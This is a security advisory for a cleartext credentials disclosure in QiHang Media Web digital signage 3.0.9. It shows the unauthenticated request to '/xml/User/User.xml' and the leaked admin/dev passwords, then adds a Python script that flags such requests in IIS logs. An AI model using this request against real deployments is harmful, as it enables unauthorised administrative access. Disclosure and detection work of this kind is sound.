QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure  
Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.  
Guangzhou Hefeng Automation Technology Co., Ltd.  
Product web page:  
Affected version:  
Summary: Digital Signage Software.  
Desc: The application suffers from a cleartext credentials disclosure vulnerability  
that allows an unauthenticated attacker to issue a request to an unprotected directory  
that hosts the XML file '/xml/User/User.xml' and obtain administrative login information,  
which allows for a successful authentication bypass attack.  
Tested on: Microsoft Windows Server 2012 R2 Datacenter  
Microsoft Windows Server 2003 Enterprise Edition  
ASP.NET 4.0.30319  
HowFor Web Server/  
Microsoft ASP.NET Web QiHang IIS Server  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2020-5579  
Advisory URL:  
$ curl  
<?xml version="1.0" encoding="utf-8"?>  
<User id="1" account="admin" password="admin" />  
<User id="2" account="dev" password="dev" />
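Detection example added to this advisory, not part of the original text or the vendor's code: it parses IIS W3C extended log lines and flags requests for the unprotected '/xml/User/User.xml' file, distinguishing reads that were actually served (HTTP 200) from ones the server refused. The log lines and field layout are constructed samples; adjust the #Fields header to match the logging configuration of the server being reviewed.

```python
"""Flag IIS W3C log entries that fetch the unprotected QiHang Media Web
credential file (/xml/User/User.xml) described in ZSL-2020-5579.
Added detection example; the log lines below are constructed samples."""
from typing import Dict, List

# Path from the advisory; compared case-insensitively because IIS is.
SENSITIVE_PATHS = ("/xml/user/user.xml",)

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-05-12 10:01:02 10.0.0.5 GET /QH.aspx - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 15
2020-05-12 10:01:09 10.0.0.5 GET /xml/User/User.xml - 80 - 198.51.100.7 curl/7.68.0 200 0 0 3
2020-05-12 10:02:11 10.0.0.5 GET /XML/USER/USER.XML - 80 - 203.0.113.9 python-requests/2.23 403 0 0 2
2020-05-12 10:03:40 10.0.0.5 GET /images/logo.png - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 4
"""

def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the lines that follow
            continue
        if not line or line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        values = line.split()           # IIS encodes spaces in values as '+'
        if len(values) != len(fields):
            continue                    # malformed line; skip rather than misattribute columns
        rows.append(dict(zip(fields, values)))
    return rows

def find_credential_reads(text: str) -> List[Dict[str, object]]:
    """Return one record per request for the credential file."""
    hits: List[Dict[str, object]] = []
    for row in parse_w3c(text):
        if row.get("cs-uri-stem", "").lower() in SENSITIVE_PATHS:
            hits.append({
                "when": f"{row['date']} {row['time']}",
                "client": row.get("c-ip", "?"),
                "agent": row.get("cs(User-Agent)", "?"),
                "status": row["sc-status"],
                # 200 means the file, and the passwords in it, reached the client
                "disclosed": row["sc-status"] == "200",
            })
    return hits
```

A 200 hit means the credentials in the file should be treated as compromised and rotated once access to the directory has been blocked.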